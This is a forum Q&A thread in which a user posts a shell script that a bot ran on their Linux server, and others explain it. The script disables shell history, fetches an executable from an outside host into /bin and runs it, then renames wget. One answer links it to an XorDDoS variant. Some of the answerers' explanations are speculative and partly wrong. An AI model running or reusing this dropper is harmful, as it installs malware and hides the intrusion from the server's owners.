# can someone explain for me what the bot was trying to do please?

Tags: linux, shell

```
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 
unset HISTFILE HISTLOG HISTORY 
HISTFILE=/dev/null 
HISTSIZE=0 
cd /bin/ 
wget http://wesaem.co.kr/download/m/5414 -O acxxxhruvc 
chmod + x acxxxhruvc /bin/acxxxhruvc 
good http://wesaem.co.kr/download/m/5414 -O acxxxhruvc 
chmod + x acxxxhruvc /bin/acxxxhruvc 
sleep 2 
mv /usr/bin/wget /usr/bin/good 
mv /bin/wget /bin/good 
ls -la /etc/daemon.cfg 
exit 0
```

Answer (score 2, accepted):

My comments are inline below

```
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

unset HISTFILE HISTLOG HISTORY
HISTFILE=/dev/null
HISTSIZE=0

cd /bin/

#download an executable
wget http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
chmod + x acxxxhruvc

#run the downloaded executable
/bin/acxxxhruvc
good http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
#it seems like it downloads an executable to overwrite the existing one
chmod + x acxxxhruvc
/bin/acxxxhruvc

sleep 2

#remove the wget application and overwrite the good application with it
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good

list the details of this daemon.cfg file
ls -la /etc/daemon.cfg

exit 0
```

Basically the good application is overwritten with wget which I guess acts the same.

Overall it doesn't do anything you probably want. Could be a malware.

Comment: if you can give me more detailed explanation please, and what's the aim behind this :)

Comment: seems like a proxy wget application. You can probably download things using it the same way you would using wget. I would try calling it with "good" as well as "bad" arguments to download

Comment: it think the line `chmod + x acxxxhruvc /bin/acxxxhruvc` is actually 2 lines, 1 to make the malware executable, and then 2, run that executable. Otherwise nothing has happened except `wget`ing a file, and then moving things around. Good luck.

Comment: @shellter could be. Those acxxxhruvc's both point to /bin/acxxx...

Then I guess `good` is also a system application.

Comment: this is confusing haha

Answer (score 0):

If you're really curious, just download the suspicious file (`acxxxhruvc`) and investigate it (e.g. using `strings acxxxhruvc`), or submit it to some scanning service (e.g. [VirusTotal](https://www.virustotal.com/en/))

In this case, it [looks like](https://www.virustotal.com/en/file/f856bbc923caad47e1e08e2d84577c78446eb66d7c50f59dae254ed81c479603/analysis/) some variant of [XorDDOs](https://isc.sans.edu/forums/diary/XOR+DDOS+Mitigation+and+Analysis/19827/)